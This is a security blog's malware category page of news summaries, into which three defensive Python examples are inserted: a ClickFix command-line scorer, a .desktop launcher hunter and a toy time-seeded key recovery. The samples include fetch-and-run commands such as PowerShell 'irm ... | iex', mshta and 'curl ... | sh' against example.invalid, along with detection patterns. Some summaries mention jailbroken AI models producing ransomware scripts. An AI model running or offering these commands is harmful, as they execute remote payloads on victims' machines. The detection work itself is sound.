Category: Malware
-
Ransomware gang busted in Thailand hotel raid
In a dramatic raid at a hotel in central Pattaya this week, Thai police have unearthed a criminal gang that was operating a ransomware and illicit gambling operation. Read more in my article on the Hot for Security blog. Graham Cluley
-
Bert ransomware: what you need to know
Bert is a recently-discovered strain of ransomware that encrypts victims’ files and demands a payment for the decryption key. Read more in my article on the Fortra blog. Graham Cluley
-
Dutch police identify users as young as 11 years old on Cracked.io hacking forum
Dutch police have announced that they have identified 126 individuals linked to the now-dismantled Cracked.io cybercrime forum. Read more in my article on the Hot for Security blog. Graham Cluley
-
Empty shelves after US’s largest natural and organic food distributor suffers cyber attack
The spate of cyber attacks impacting the retail industry continues, with the latest victim being United Natural Foods (UNFI), which supplies organic produce to Whole Foods, Amazon, Target, and Walmart, amongst many others. Read more in my article on the Hot for…
-
Hackers Advertising New Blackhat Tool Nytheon AI on Popular Hacking Forums
A sophisticated new threat platform, Nytheon AI, has emerged, which combines multiple uncensored large language models (LLMs) built specifically for malicious activities. The platform, discovered by Cato CTRL, is being actively promoted on popular hacking forums, including XSS and various Telegram channels, representing a…
-
New Malware Attack Via “I’m not a Robot Check” to Trick Users into Running Malware
A sophisticated new malware attack vector manipulates users through fake browser verification prompts designed to mimic legitimate CAPTCHA systems. The attack combines social engineering with clipboard manipulation and obfuscated PowerShell commands to trick victims into voluntarily executing…
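The detection side of the pattern described above, as an added example that is not code from the article or from any vendor it mentions: the fake-CAPTCHA lure ends with the victim pasting a command into the Win+R box, so the observable is a process-creation command line with a recognisable shape (hidden PowerShell window, policy bypass, a download piped straight into `iex` or `mshta`, and often a trailing “verification” comment that makes the pasted text look harmless). The Python below scores constructed command lines, such as those an EDR or Sysmon process-creation event would carry, against that shape. The rule set, weights, threshold and sample lines are assumptions for illustration.

```python
"""Score process command lines for ClickFix / fake-CAPTCHA traits.

Added example, not code from the article: the rule set, weights and the
sample command lines below are constructed for illustration.
"""
import re
from dataclasses import dataclass, field

# (rule name, regex, weight). Weights are an assumption chosen so that a
# single common-but-legitimate trait (e.g. an encoded command) stays below
# the default threshold, while a download piped into an interpreter alone
# is enough to flag.
RULES = [
    ("hidden_window", r"-w(?:indowstyle)?\s+h(?:idden)?\b", 2),
    ("policy_bypass", r"-(?:ep|executionpolicy)\s+bypass\b", 1),
    ("encoded_command", r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 3),
    ("download_to_exec",
     r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b.*\|\s*(?:iex|invoke-expression)\b", 4),
    ("mshta_remote", r"\bmshta(?:\.exe)?\s+https?://", 4),
    ("captcha_comment", r"#.*(?:not a robot|verification|captcha)", 3),
]
COMPILED = [(name, re.compile(pattern, re.I), weight) for name, pattern, weight in RULES]


@dataclass
class Verdict:
    command: str
    score: int = 0
    hits: list = field(default_factory=list)


def score_command(command: str) -> Verdict:
    """Apply every rule to one command line and accumulate the weights."""
    verdict = Verdict(command)
    for name, regex, weight in COMPILED:
        if regex.search(command):
            verdict.hits.append(name)
            verdict.score += weight
    return verdict


def is_clickfix(command: str, threshold: int = 4) -> bool:
    return score_command(command).score >= threshold


# Constructed process-creation command lines (not real telemetry).
SAMPLE_COMMANDS = [
    # Typical paste-into-Win+R payload: hidden window, policy bypass,
    # remote script piped into iex, trailing "verification" comment.
    'powershell.exe -w hidden -ep bypass -c "irm https://example.invalid/verify | iex" '
    "# I'm not a robot - reCAPTCHA Verification ID: 7811",
    # Variant that hands an .hta to mshta instead of PowerShell.
    "mshta.exe https://example.invalid/ray.hta",
    # Benign admin usage.
    'powershell.exe -NoProfile -Command "Get-Process | Where-Object CPU -gt 100"',
    "cmd.exe /c dir C:\\Users",
    # Encoded command on its own: suspicious but common in legitimate tooling.
    "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
]


def triage(commands=SAMPLE_COMMANDS, threshold: int = 4) -> list:
    """Return the verdicts that meet the threshold, highest score first."""
    flagged = [v for v in map(score_command, commands) if v.score >= threshold]
    return sorted(flagged, key=lambda v: v.score, reverse=True)


if __name__ == "__main__":
    for v in triage():
        print(f"{v.score:2d} {', '.join(v.hits):<55} {v.command[:60]}")
```

Feed it the command-line field of your process-creation telemetry; the parent process (explorer.exe launching PowerShell from the Run dialog) is a second signal worth adding in a real rule.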
-
US offers $10 million reward for tips about state-linked RedLine hackers
How would you like to earn yourself millions of dollars? Well, it may just be possible – if you have information which could help expose the identities of cybercriminals involved with the notorious RedLine information-stealing malware. Read more in my article on the Tripwire…
-
Marks & Spencer’s ransomware nightmare – more details emerge
Over Easter, retail giant Marks & Spencer (M&S) discovered that it had suffered a highly damaging ransomware attack that left some shop shelves empty, shut down online ordering, some staff unable to clock in and out, and caused some of its major suppliers to resort to…
-
Denodo Scheduler Vulnerability Lets Attackers Execute Remote Code
A significant security vulnerability has been discovered in Denodo Scheduler, a data management software component, that allows attackers to execute remote code on affected systems. The flaw, identified as CVE-2025-26147, is a path traversal vulnerability in the Kerberos authentication configuration feature, potentially compromising the security of enterprise…
-
Interlock ransomware: what you need to know
“We don’t just want payment; we want accountability.” The malicious hackers behind the Interlock ransomware try to justify their attacks. Learn more about what you need to know about Interlock in my article on the Tripwire State of Security blog. Graham Cluley
-
Damascened Peacock: Russian hackers targeted UK Ministry of Defence
The UK’s Ministry of Defence has revealed that it was the target of a sophisticated cyber attack that saw Russia-linked hackers pose as journalists. Read more in my article on the Hot for Security blog. Graham Cluley
-
New Botnet Hijacks 9,000 ASUS Routers & Enables SSH Access by Injecting Public Key
A sophisticated botnet campaign dubbed “AyySSHush” has compromised over 9,000 ASUS routers worldwide, establishing persistent backdoor access that survives firmware updates and reboots. The stealthy operation, first detected in March 2025, demonstrates advanced nation-state-level tradecraft by exploiting authentication vulnerabilities and legitimate…
-
3AM ransomware attack poses as a call from IT support to compromise networks
Cybercriminals are getting smarter. Not by developing new types of malware or exploiting zero-day vulnerabilities, but by simply pretending to be helpful IT support desk workers. Find out how they do it in my article on the Tripwire State of Security blog.…
-
PupkinStealer Attacks Windows Systems to Steal Login Credentials & Desktop Files
A new information-stealing malware dubbed “PupkinStealer” has been identified by cybersecurity researchers, targeting sensitive user data through a straightforward yet effective approach. First observed in April 2025, this .NET-based malware written in C# focuses on stealing browser credentials, messaging app sessions, and desktop files,…
-
New FrigidStealer Malware Attacking macOS Users to Steal Login Credentials
FrigidStealer, a sophisticated information-stealing malware that emerged in January 2025, is actively targeting macOS endpoints to steal sensitive user data through deceptive tactics. Unlike traditional malware, FrigidStealer exploits user trust in routine software updates, making it particularly insidious. The malware has raised significant concerns among…
-
Google Threat Intelligence Launches Actionable Technique To Hunt for Malicious .Desktop Files
Google Threat Intelligence has launched a new blog series aimed at empowering security professionals with advanced threat hunting techniques, kicking off with a deep dive into detecting malicious .desktop files on Linux systems. .desktop files, standard configuration files in Linux desktop environments, define…
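A .desktop file is an INI-style text file whose `[Desktop Entry]` section carries the launcher’s display name, icon and the `Exec=` command the desktop runs on double-click, which is exactly why a launcher named like a document but executing a shell one-liner is worth hunting for. As an added example, not Google’s technique or code from the article, the Python below parses that section with the standard library and scores it on a handful of heuristics (shell wrapper, base64 decode, network fetch, execution from a temporary directory, document-like name, silent terminal). The heuristics, weights and the three sample files are constructed for illustration.

```python
"""Hunt for suspicious Linux .desktop launchers.

Added example, not Google's technique or code from the article: the
heuristics, weights and sample files are constructed for illustration.
"""
import configparser
import re
from pathlib import Path

# Exec-line heuristics: (name, regex, weight). Weights are an assumption.
EXEC_RULES = [
    ("shell_wrapper", r"^(?:/bin/|/usr/bin/)?(?:ba)?sh\s+-c\b", 2),
    ("base64_decode", r"base64\s+(?:-d|--decode)\b", 3),
    ("network_fetch", r"\b(?:curl|wget)\b.*https?://", 3),
    ("tmp_execution", r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/", 2),
    ("python_oneliner", r"\bpython3?\s+-c\b", 2),
]
DOC_EXTENSION = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|txt)$", re.I)


def parse_desktop(text: str):
    """Return the [Desktop Entry] section, or None if the text has none."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str          # .desktop keys are case-sensitive
    parser.read_string(text)
    return parser["Desktop Entry"] if parser.has_section("Desktop Entry") else None


def score_entry(entry) -> tuple:
    """Score one [Desktop Entry] section; returns (score, [hit names])."""
    hits, score = [], 0
    exec_line = entry.get("Exec", "")
    for name, pattern, weight in EXEC_RULES:
        if re.search(pattern, exec_line, re.I):
            hits.append(name)
            score += weight
    # A launcher whose visible name looks like a document is a lure.
    if DOC_EXTENSION.search(entry.get("Name", "")):
        hits.append("doc_disguise")
        score += 2
    # A shell command with Terminal=false runs with nothing on screen.
    if "shell_wrapper" in hits and entry.get("Terminal", "false").lower() == "false":
        hits.append("hidden_terminal")
        score += 1
    return score, hits


def score_text(text: str) -> tuple:
    entry = parse_desktop(text)
    return score_entry(entry) if entry is not None else (0, ["not_a_desktop_entry"])


def hunt(paths, threshold: int = 4) -> list:
    """Score files on disk; returns [(path, score, hits)] at or above threshold."""
    results = []
    for path in paths:
        try:
            score, hits = score_text(Path(path).read_text(errors="replace"))
        except (OSError, configparser.Error):
            continue
        if score >= threshold:
            results.append((str(path), score, hits))
    return sorted(results, key=lambda r: r[1], reverse=True)


# Constructed samples (not files from the article).
SAMPLES = {
    "invoice_lure.desktop": """[Desktop Entry]
Type=Application
Name=Invoice_2025.pdf
Icon=application-pdf
Exec=bash -c "curl -s https://example.invalid/p.sh | sh; xdg-open /tmp/invoice.pdf"
Terminal=false
""",
    "text_editor.desktop": """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.TextEditor
Terminal=false
Categories=Utility;TextEditor;
""",
    "update_dropper.desktop": """[Desktop Entry]
Type=Application
Name=System Update
Exec=/bin/sh -c "echo ZWNobyBoZWxsbw== | base64 -d | sh"
Terminal=false
NoDisplay=true
""",
}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, *score_text(text))
    # On a live host, e.g.: hunt(Path.home().glob("**/*.desktop"))
```

Run `hunt()` over `~/.config/autostart`, `~/.local/share/applications` and `~/Desktop` (plus the equivalents under `/etc/xdg/autostart` and `/usr/share/applications`); autostart entries deserve a lower threshold, since anything there runs at every login.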
-
Two years’ jail for down-on-his-luck man who sold ransomware online
A man has been jailed in Ireland for two years after pleading guilty to offences related to his illegal online business that sold ransomware and other malware, as well as stolen credit card details, and false bank accounts. Read more in my article on the…
-
“PupkinStealer” A New .NET-Based Malware Steals Browser Credentials & Exfiltrates via Telegram
A newly identified information-stealing malware dubbed PupkinStealer has been developed in C# using the .NET framework. This lightweight yet effective malware targets sensitive user data, including browser credentials, desktop files, messaging app sessions, and screenshots. According to a CYFIRMA detailed analysis shared with Cyber Security…
-
Beware! Fake AI Video Generation Platforms Drop Stealer Malware on Your Computers
As artificial intelligence (AI) tools gain mainstream traction for content creation, cybercriminals are capitalizing on the hype with a sophisticated new attack vector: fake AI platforms promising advanced video and image editing capabilities. These fraudulent sites, amplified through viral social media campaigns and…
-
Smashing Security podcast #416: High street hacks, and Disney’s Wingdings woe
Brits face empty shelves and suspended meal deals as cybercriminals hit major high street retailers, and a terminated Disney employee gets revenge with a little help with Wingdings. Plus Graham challenges Carole to a game of “Malware or metal?”, and we wonder just happens…
-
NCSC warns of IT helpdesk impersonation trick being used by ransomware gangs after UK retailers attacked
The UK’s National Cyber Security Centre (NCSC) has warned the IT helpdesks of retailers to be on their guard against bogus support calls they might receive from hackers pretending to be staff locked out of their accounts. Read more…
-
Smashing Security podcast #415: Hacking hijinks at the hospital, and WASPI scams
He’s not a pop star, but Jeffrey Bowie is alleged to have toured staff areas of a hospital in Oklahoma, hunting for computers he could install spyware on. We dive into the bizarre case of the man accused of hacking medical networks and…
-
Ransomware attacks on critical infrastructure surge, reports FBI
The FBI is set to report that ransomware was the most pervasive cybersecurity threat to US critical infrastructure during the year of 2024, with complaints of ransomware attacks against critical sectors jumping 9% over the previous year. Read more in my article on the Tripwire State of…
-
Hackers access sensitive SIM card data at South Korea’s largest telecoms company
Mobile network operator SK Telecom, which serves approximately 34 million subscribers in South Korea, has confirmed that it suffered a cyber attack earlier this month that saw malware infiltrate its internal systems, and access data related to customers’ SIM cards. Read more in…
-
North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers
A sophisticated North Korean advanced persistent threat (APT) group known as “Contagious Interview” has established elaborate fake cryptocurrency consulting companies to target job seekers with specialized malware. The group, a subunit of the infamous North Korean state-sponsored Lazarus Group, has created three…
-
Smashing Security podcast #414: Zoom.. just one click and your data goes boom!
Graham explores how the Elusive Comet cybercrime gang are using a sneaky trick of stealing your cryptocurrency via an innocent-appearing Zoom call, and Carole goes under the covers to explore the extraordinary lengths bio-hacking millionaire Bryan Johnson is attempting to extend his…
-
Hackers Attacking Organizations With New Malware Mimicking Networking Software Updates
A sophisticated backdoor targeting various large Russian organizations across government, finance, and industrial sectors has been uncovered during a cybersecurity investigation in April 2025. The malware, which masquerades as legitimate updates for ViPNet secure networking software, enables attackers to steal sensitive data and deploy…
-
Slopsquatting
As AI coding assistants invent nonexistent software libraries to download and use, enterprising attackers create and upload libraries with those names—laced with malware, of course. Bruce Schneier
-
Medusa ransomware gang claims to have hacked NASCAR
The Medusa ransomware-as-a-service (RaaS) claims to have compromised the computer systems of NASCAR, the United States’ National Association for Stock Car Auto Racing, and made off with more than 1TB of data. Read more in my article on the Hot for Security blog. Graham Cluley
-
Beware Developers! Malicious NPM Packages Targeting PayPal Users to Steal Sensitive Data
FortiGuard Labs, Fortinet’s AI-driven threat intelligence arm, has uncovered a series of malicious NPM packages designed to steal sensitive information from developers and target PayPal users. Detected between March 5 and March 14, 2025, these packages were published by a threat actor using…
-
Ransomware reaches a record high, but payouts are dwindling
Will you be shedding a tear for the cybercriminals? Read more in my article on the Tripwire blog. Graham Cluley
-
Hackers Leveraging Fast Flux Technique to Evade Detection & Hide Malicious Servers
CISA warns of threat actors’ increasing adoption of the fast flux technique to evade detection and conceal malicious server infrastructures. As cybercriminal operations grow increasingly sophisticated, threat actors adopt advanced techniques like fast flux to mask malicious infrastructure, evade defensive measures, and maintain persistent access…
-
HellCat ransomware: what you need to know
HellCat – the ransomware gang that has been known to demand payment… in baguettes! Are they rolling in the dough? Bread it and weep in my article on the Tripwire State of Security blog. Graham Cluley
-
The AI Fix #44: AI-generated malware, and a stunning AI breakthrough
In episode 44 of The AI Fix, ChatGPT won’t build a crystal meth lab, GPT-4o improves the show’s podcast art, some students manage to screw in a lightbulb, Google releases Gemini 2.5 Pro Experimental and nobody notices, and Mark invents a clock for measuring…
-
Hackers exploit little-known WordPress MU-plugins feature to hide malware
A new security issue is putting WordPress-powered websites at risk. Hackers are abusing the “Must-Use” plugins (MU-plugins) feature to hide malicious code and maintain long-term access on hacked websites. Read more in my article on the Hot for Security blog. Graham Cluley
-
VanHelsing ransomware: what you need to know
First reported earlier in March 2025, VanHelsing is a new ransomware-as-a-service operation. Read more in my article on the Tripwire State of Security blog. Graham Cluley
-
New IOCONTROL Malware Attacking Critical Infrastructure to Gain Remote Access and Control
A newly identified malware strain dubbed “IOCONTROL” has emerged as a critical threat to operational technology (OT) and Internet of Things (IoT) systems, particularly targeting fuel-management infrastructure in the United States and Israel. First observed in December 2024, this Linux-based malware has been…
-
Smashing Security podcast #409: Peeping perverts and FBI phone calls
In episode 409 of the “Smashing Security” podcast, we uncover the curious case of the Chinese cyber-attack on Littleton’s Electric Light Company, and a California landlord’s hidden camera scandal. Find out about this, and more, in the latest edition of the “Smashing Security” podcast by…
-
BlackLock ransomware: What you need to know
BlackLock has become a big deal, very quickly. It has been predicted to be one of the biggest ransomware-as-a-service operations of 2025. Read more in my article on the Tripwire State of Security blog. Graham Cluley
-
Supply-chain CAPTCHA attack hits over 100 car dealerships
A security researcher has discovered that the websites of over 100 car dealerships have been compromised in a supply-chain attack that attempted to infect the PCs of internet visitors. Read more in my article on the Hot for Security blog. Graham Cluley
-
Free file converter malware scam “rampant” claims FBI
Whether you’re downloading a video from YouTube or converting a Word document into a PDF file, there’s a chance that you might be unwittingly handing control of your PC straight into the hands of cybercriminals. Read more in my article on the Hot for Security blog. Graham…
-
TP-Link Router Botnet
There is a new botnet that is infecting TP-Link routers: The botnet can lead to command injection which then makes remote code execution (RCE) possible so that the malware can spread itself across the internet automatically. This high severity security flaw (tracked as CVE-2023-1389) has also been used to spread other malware…
-
New Campaign Attacking PyPI Users to Steal Sensitive Data Including Cloud Tokens
Security researchers have uncovered a sophisticated malware campaign targeting users of the Python Package Index (PyPI), Python’s official third-party software repository. This latest attack vector involves several malicious packages disguised as time-related utilities, which are actually designed to steal sensitive information including cloud…
-
Decrypting Linux/ESXi Akira Ransomware Files Without Paying the Ransom
A cybersecurity researcher has successfully broken the encryption used by the Linux/ESXi variant of the Akira ransomware, enabling data recovery without paying the ransom demand. The breakthrough exploits a critical weakness in the ransomware’s encryption methodology. According to the researcher, the malware uses the current time in…
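Why seeding key material from the clock is fatal, as an added example that is not Akira’s code or the researcher’s tool: if the only secret behind a key is a timestamp, the key space collapses to the number of nanoseconds in whatever window the attacker can bound (file mtimes, log entries, the time the encryptor was launched), and a known plaintext prefix such as a file-format magic lets every candidate be checked with a couple of hashes. The Python below builds a toy SHA-256 based stream cipher keyed purely from a nanosecond timestamp, encrypts a constructed PDF, then recovers the seed and the plaintext by enumerating a small window. The key schedule, cipher, timestamp, window and sample data are all assumptions; the real search space is far larger, but the point is that it is finite and enumerable.

```python
"""Recover a time-seeded encryption key from a known plaintext prefix.

Added example, not Akira's code or the researcher's tool: the key schedule
and stream cipher below are a toy built on SHA-256 whose only secret is a
nanosecond timestamp, which is the class of weakness the article describes.
Timestamps, window and sample data are constructed.
"""
import hashlib
import os


def key_from_timestamp(ts_ns: int) -> bytes:
    """Toy key schedule: all 256 bits of 'key' come from one 64-bit timestamp."""
    return hashlib.sha256(b"toy-kdf" + ts_ns.to_bytes(8, "big")).digest()


def keystream(key: bytes, length: int) -> bytes:
    """Toy counter-mode keystream: SHA-256(key || counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(plaintext: bytes, ts_ns: int) -> bytes:
    return xor(plaintext, keystream(key_from_timestamp(ts_ns), len(plaintext)))


def decrypt(ciphertext: bytes, ts_ns: int) -> bytes:
    return xor(ciphertext, keystream(key_from_timestamp(ts_ns), len(ciphertext)))


def recover_timestamp(ciphertext: bytes, known_prefix: bytes,
                      window_start_ns: int, window_end_ns: int):
    """Brute-force the seed over [window_start_ns, window_end_ns).

    Only the first len(known_prefix) bytes of keystream are derived per
    candidate, so each guess costs two short hashes.
    """
    target = ciphertext[:len(known_prefix)]
    for ts in range(window_start_ns, window_end_ns):
        if xor(known_prefix, keystream(key_from_timestamp(ts), len(target))) == target:
            return ts
    return None


# Constructed victim file: a PDF, so its first bytes are predictable.
KNOWN_PREFIX = b"%PDF-1.7"
SAMPLE_PLAINTEXT = KNOWN_PREFIX + b"\n% constructed sample body, not a real document\n"
# Assumed moment the encryptor ran (nanoseconds since the epoch).
ENCRYPTION_TIME_NS = 1_736_000_000_123_456_789
SAMPLE_CIPHERTEXT = encrypt(SAMPLE_PLAINTEXT, ENCRYPTION_TIME_NS)
# Assumed search window: 50 microseconds around the file's mtime. A real
# search is far wider; the point is that it is finite and enumerable.
WINDOW = (ENCRYPTION_TIME_NS - 20_000, ENCRYPTION_TIME_NS + 30_000)


def demo() -> tuple:
    """Recover the seed from the sample, then decrypt with it."""
    ts = recover_timestamp(SAMPLE_CIPHERTEXT, KNOWN_PREFIX, *WINDOW)
    return ts, (decrypt(SAMPLE_CIPHERTEXT, ts) if ts is not None else None)


def safe_key() -> bytes:
    """What the key should come from instead: a CSPRNG, not the clock."""
    return os.urandom(32)


if __name__ == "__main__":
    ts, plaintext = demo()
    print("recovered seed:", ts)
    print("plaintext:", plaintext)
```

The same structure applies when the seed is a process ID, an uptime counter or a truncated timestamp: bound the range from forensic artefacts, pick a known plaintext (file magic, a ZIP local-file header, an ESXi VMDK descriptor line), and test candidates against the first bytes of ciphertext.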
-
Medusa ransomware: FBI and CISA urge organisations to act now to mitigate threat
The Medusa ransomware gang continues to present a major threat to the critical infrastructure sector, according to a newly-released – with at least one organisation hit with a “triple-extortion” threat. Read more in my article on the Tripwire State of Security blog.…
-
Smashing Security podcast #408: A gag order backfires, and a snail mail ransom demand
What happens when a healthcare giant’s legal threats ignite a Streisand Effect wildfire… while a ransomware gang appears to ditch the dark web for postage stamps? Find out about this, and more, in the latest edition of the “Smashing Security” podcast…
-
Man found guilty of planting infinite loop logic bomb on ex-employer’s system
Davis Lu had planted malicious Java code onto his employer’s network that would cause “infinite loops” that would ultimately result in the server crashing or hanging. Read more in my article on the Hot for Security blog. Graham Cluley
-
Chinese Hackers’ New Malware Dubbed ‘Squidoor’ Attacking Global Organizations
A sophisticated backdoor malware called “Squidoor” is being deployed by suspected Chinese threat actors against organizations across South America and Southeast Asia. The malware, designed for exceptional stealth, offers attackers multiple methods to maintain persistent access to compromised networks while evading detection from advanced security systems. Initial…
-
Thousands of WordPress Websites Infected with Malware
The malware includes four separate backdoors: Creating four backdoors facilitates the attackers having multiple points of re-entry should one be detected and removed. A unique case we haven’t seen before. Which introduces another type of attack made possible by abusing websites that don’t monitor 3rd party dependencies in…
-
Smashing Security podcast #407: HP’s hold music, and human trafficking
Journey with us to Myanmar’s shadowy scam factories, where trafficked workers are forced to run romance-baiting and fake tech support scams, and find out why a company’s mandatory hold time for tech support could lead to innocent users having their computers compromised. All this and…
-
Android App With 220,000+ Downloads From Google Play Installs Banking Trojan
A sophisticated Android banking trojan campaign leveraging a malicious file manager application accumulated over 220,000 downloads on the Google Play Store before its removal. Dubbed Anatsa (also known as TeaBot), the malware targets global financial institutions through a multi-stage infection process. It deploys fake…
-
Cactus ransomware: what you need to know
Cactus is a ransomware-as-a-service (RaaS) group that encrypts victims’ data and demands a ransom for a decryption key. Read more about it in my article on the Tripwire State of Security blog. Graham Cluley
-
CISA refutes claims it has been ordered to stop monitoring Russian cyber threats
It’s been a confusing few days in the world of American cybersecurity… Read more in my article on the Hot for Security blog. Graham Cluley
-
Stop targeting Russian hackers, Trump administration orders US Cyber Command
The Trump administration has told US Cyber Command and CISA to stop following or reporting on Russian cyber threats. Yes, Russia! That country everyone used to agree was home to lots of ransomware gangs and hackers. Hmmm… Read more in my article on the Hot…
-
Warning issued as hackers offer firms fake cybersecurity audits to break into their systems
Companies are being warned that malicious hackers are using a novel technique to break into businesses – by pretending to offer audits of the company’s cybersecurity. Read more in my article on the Tripwire State of Security blog. Graham Cluley
-
Flaw found in stalkerware apps, exposing millions of people. Here’s how to find out if your phone is being spied upon
A serious security vulnerability has been found in popular stalkerware apps, exposing the sensitive personal information and communications of millions of people. Read more in my article on the Hot for Security blog. Graham…
-
Smashing Security podcast #405: A crypto con exchange, and soaring ticket scams
From shadowy Bitcoin exchanges to Interpol’s most wanted, Alexander Vinnik was the alleged kingpin behind BTC-e, a $4bn crypto laundering empire. Learn more about him, and how he became a geopolitical pawn between the US, France, and Russia. Plus! Hear how concert-goers are…
-
Weaponized Signal, Line, and Gmail Apps Deliver Malware That Changes System Defenses
In a sophisticated cyberattack campaign targeting Chinese-speaking users, malicious actors have weaponized fake versions of popular applications such as Signal, Line, and Gmail. These fake and weaponized apps are distributed via deceptive download pages that deliver malware capable of altering system defenses, evading detection,…
-
US charges two Russian men in connection with Phobos ransomware operation
Roman Berezhnoy and Egor Nikolaevich Glebov are alleged to have extorted over US $16 million in ransom payments using the Phobos ransomware, impacting over 1000 organisations in the United States. Read more in my article on the Hot for Security blog. Graham Cluley
-
Delivering Malware Through Abandoned Amazon S3 Buckets
Here’s a supply-chain attack just waiting to happen. A group of researchers searched for, and then registered, abandoned Amazon S3 buckets for about $400. These buckets contained software libraries that are still used. Presumably the projects don’t realize that they have been abandoned, and still ping them for…
-
Smashing Security podcast #404: Podcast not found
The story of how hackers managed to compromise the US Government’s official SEC Twitter account to boost the price of Bitcoins, AI isn’t helping reduce the rife conspiracy theories inside classrooms, and is the funeral bell tolling for ransomware? All this and more is discussed in the latest…
-
FinStealer Malware Attacking Leading Indian Bank’s Mobile Users To Steal Login Credentials
A sophisticated malware campaign dubbed “FinStealer” is actively targeting customers of a leading Indian bank through fraudulent mobile applications. The malware, identified as Trojan.rewardsteal/joxpk, employs advanced tactics to steal banking credentials and personal information from unsuspecting users. The malicious campaign operates through a…
-
Screenshot-Reading Malware
Kaspersky is reporting on a new type of smartphone malware. The malware in question uses optical character recognition (OCR) to review a device’s photo library, seeking screenshots of recovery phrases for crypto wallets. Based on their assessment, infected Google Play apps have been downloaded more than 242,000 times. Kaspersky says: “This is the…
-
Fake Reddit and WeTransfer Sites are Pushing Malware
There are thousands of fake Reddit and WeTransfer webpages that are pushing malware. They exploit people who are using search engines to search sites like Reddit. Unsuspecting victims clicking on the link are taken to a fake WeTransfer site that mimics the interface of the popular file-sharing…
-
DeepSeek R1 Jailbroken to Generate Ransomware Development Scripts
DeepSeek R1, the latest AI model from China, is making waves in the tech world for its reasoning capabilities. Positioned as a challenger to AI giants like OpenAI, it has already climbed to 6th place on the Chatbot Arena benchmarking list, surpassing notable models such as Meta’s…
-
Akira’s New Linux Ransomware Attacking VMware ESXi Servers
The Akira ransomware group, a prominent player in the Ransomware-as-a-Service (RaaS) domain since March 2023, has intensified its operations with a new Linux variant targeting VMware ESXi servers. Initially focused on Windows systems, Akira expanded its scope in April 2023 by deploying a Linux-based encryptor specifically designed…
-
New VPN Backdoor
A newly discovered VPN backdoor uses some interesting tactics to avoid detection: When threat actors use backdoor malware to gain access to a network, they want to make sure all their hard work can’t be leveraged by competing groups or detected by defenders. One countermeasure is to equip the backdoor with a…
-
Medusa ransomware: what you need to know
Medusa is a ransomware-as-a-service (RaaS) platform that has targeted organisations around the world. Read more about it in my article on the Tripwire State of Security blog. Graham Cluley
-
Gootloader inside out
Open-source intelligence reveals the server-side code of this pernicious SEO-driven malware – without needing a lawyer afterward. Gabor Szappanos
-
FBI Deletes PlugX Malware from Thousands of Computers
According to a DOJ press release, the FBI was able to delete the Chinese-used PlugX malware from “approximately 4,258 U.S.-based computers and networks.” Details: To retrieve information from and send commands to the hacked machines, the malware connects to a command-and-control server that is operated by the…
-
Space Bears ransomware: what you need to know
The Space Bears ransomware gang stands out from the crowd by presenting itself better than many legitimate companies, with corporate stock images and a professional-looking leak site. Read more in my article on the Tripwire State of Security blog. Graham Cluley
-
Smashing Security podcast #398: Fake CAPTCHAs, Harmageddon, and Krispy Kreme
This week, we delve into the dark world of fake CAPTCHAs designed to hijack your computer. Plus, the AI safety clock is ticking down – is doomsday closer than we think? And to top it off, we uncover the sticky situation of Krispy Kreme facing…
-
Doughnut orders disrupted! Krispy Kreme suffers hack attack
Krispy Kreme, the dispenser of delectable doughnuts, says that it suffered a cyber attack at the end of last month which saw its IT systems compromised and has disrupted online orders in parts of the United States. Read more in my article on the Hot for Security…
-
3AM ransomware: what you need to know
The 3AM ransomware first emerged in late 2023. Like other ransomware, 3AM exfiltrates victims’ data (demanding a ransom is paid) and encrypts the copies left behind. Here’s what you need to know. Read more in my article on the Tripwire State of Security blog. Graham Cluley
-
Detecting Pegasus Infections
This tool seems to do a pretty good job. The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection. For paying iVerify customers, the tool regularly checks devices for…
-
Ransomware-hit vodka maker Stoli files for bankruptcy in the United States
Stoli Group USA, the US subsidiary of vodka maker Stoli, has filed for bankruptcy – and a ransomware attack is at least partly to blame. The American branch of Stoli, which imports and distributes Stoli brands in the United States, as well as the…
-
Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users
It’s not a new technique, but that doesn’t mean that cybercriminals cannot make rich rewards from SEO poisoning. Read more in my article on the Tripwire State of Security blog. Graham Cluley
-
Why Phishers Love New TLDs Like .shop, .top and .xyz
Phishing attacks increased nearly 40 percent in the year ending August 2024, with much of that growth concentrated at a small number of new generic top-level domains (gTLDs) — such as .shop, .top, .xyz — that attract scammers with rock-bottom prices and no meaningful registration…
-
No guarantees of payday for ransomware gang that claims to have hacked children’s hospital
What is the point of INC Ransom’s attack on Alder Hey? They are not likely to be paid, and the attack on a children’s hospital only increases the chances that they will one day find their collars felt by law enforcement.…
-
UK hospital, hit by cyberattack, resorts to paper and postpones procedures
A British hospital is grappling with a major cyberattack that has crippled its IT systems and disrupted patient care. Read more in my article on the Hot for Security blog. Graham Cluley
-
Mimic ransomware: what you need to know
What makes Mimic particularly unusual is that it exploits the API of a legitimate Windows file search tool (“Everything” by Voidtools) to quickly locate files for encryption. Find out more about the threat in my article on the Tripwire State of Security blog. Graham Cluley